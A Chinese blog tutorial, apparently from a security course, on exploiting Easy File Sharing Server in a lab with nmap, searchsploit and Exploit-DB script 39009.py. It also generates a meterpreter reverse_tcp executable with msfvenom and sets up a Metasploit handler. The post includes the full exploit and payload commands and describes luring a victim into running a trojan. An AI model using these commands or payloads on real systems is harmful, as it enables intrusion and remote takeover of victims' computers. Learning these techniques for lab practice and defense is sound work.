当前位置: 首页 > news >正文

easy file sharing server漏洞渗透测试和kali中生成被控端

一.远程控制-正向连接方式-黑客(客户端)先主动连接木马(服务端)

二.远程控制-反向连接-主动连接黑客(客户端)

诱使Rebecca

下载server.EXE并运行

server.EXE已配置

Yuri的IP地址和端口

三.easy file sharing server漏洞渗透测试

在windows上安装easy file sharing server

然后查询靶机(windows)的IP地址

在靶机上打开easy file sharing server,然后再打开kali的终端用nmap 扫描目标主机开放的端口,输入命令【nmap -sV [IP]】

发现80端口上运行了easy file sharing server

然后searchsploit查EasyFileSharing存在的漏洞,输入【searchsploit easy file sharing server】

以该漏洞为例,利用该漏洞使得靶机运行计算器

现在执行这个python脚本,执行时需要提供两个参数(靶机IP和目标端口),输入【python2 /usr/share/exploitdb/exploits/windows/remote/39009.py [靶机IP] 80】,执行该命令后渗透模块会连接到【目标IP】的80端口,将指定代码送过去

可以看到我们已经启动了计算器。

四.kali中生成被控端

Msfvenom 用到参数-p、-f 、-o

-p windows/meterpreter/reverse_tcp LHOST=192.168.182.3 LPORT=5000 -f exe –o /root/payload.exe

-p, –payload Payload to use;指定哪些有效载荷生成

本例中 windows/meterpreter/reverse_tcp :用于Windows平台的反向远程控制程序

-f, –format Output format;指定有效载荷的格式

本例中 exe 生成Windows系统的可执行文件

-o, –out Save the payload;指定保存位置

本例中 /root/payload.exe

1.首先ifconfig查看kali的IP地址

2.输入命令msfvenom -p windows/meterpreter/reverse_tcp lhost=【IP地址】lport=5000 -f exe -o /var/payload.exe,可以看到生成的被控端程序文件在var目录下

3.直接输入msfconsole命令启动Metasploit

4.依次输入use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 【IP地址】

set lport 5000

exploit

主控端启动完成

5.将生成的被控端提交到www.virustotal.com检测

http://www.jsqmd.com/news/163117/

相关文章:

  • PyTorch-CUDA镜像适配A100/H100显卡实测表现
  • 用Docker运行PyTorch项目?这个CUDA镜像最稳定
  • PyTorch梯度裁剪防止爆炸(GPU训练稳定性提升)
  • PyTorch模型推理延迟高?尝试CUDA核心优化策略
  • Blender MMD Tools终极教程:从入门到精通
  • 使用Git LFS管理PyTorch训练的大体积模型文件
  • Git Commit提交代码前,请确保你的PyTorch环境一致性
  • PyTorch Batch Size调优指南(最大化GPU利用率)
  • PyTorch模型推理批处理提升GPU吞吐量
  • 3分钟搞定微信消息自动转发:多群同步的终极解决方案
  • Docker Volume持久化存储PyTorch训练结果
  • NVIDIA Profile Inspector 显卡性能调优终极指南
  • Git标签管理PyTorch项目的重要版本节点
  • 碧蓝航线Alas脚本完全攻略:智能自动化解放你的双手
  • 百度网盘解析工具完全使用指南:突破下载限制实现高速下载
  • 操作指南:使用官方工具执行Vivado卸载
  • PyTorch反向传播机制详解(GPU并行计算支撑)
  • Git克隆大型AI仓库后如何配置PyTorch依赖环境
  • Git Reset回退错误的PyTorch代码更改
  • 全面讲解hbuilderx制作网页集成视频课程模块方法
  • 浏览器个性化革命:用用户脚本重新定义你的网页体验
  • NCM音频解密终极指南:一键解锁加密音乐文件
  • Jupyter插件推荐:提升PyTorch代码编写体验
  • 从零实现一个最小化的嵌入式可执行文件示例
  • 终极星露谷物语XNB文件处理工具:轻松解锁游戏资源定制
  • PyTorch自定义Dataset类高效读取GPU训练数据
  • PyTorch张量在CPU和GPU之间迁移的正确姿势
  • NVIDIA Profile Inspector完全指南:专业级显卡调校工具深度解析
  • 百度网盘提取码查询工具使用指南:快速获取免费访问密码
  • Jupyter Notebook魔法命令加速PyTorch代码调试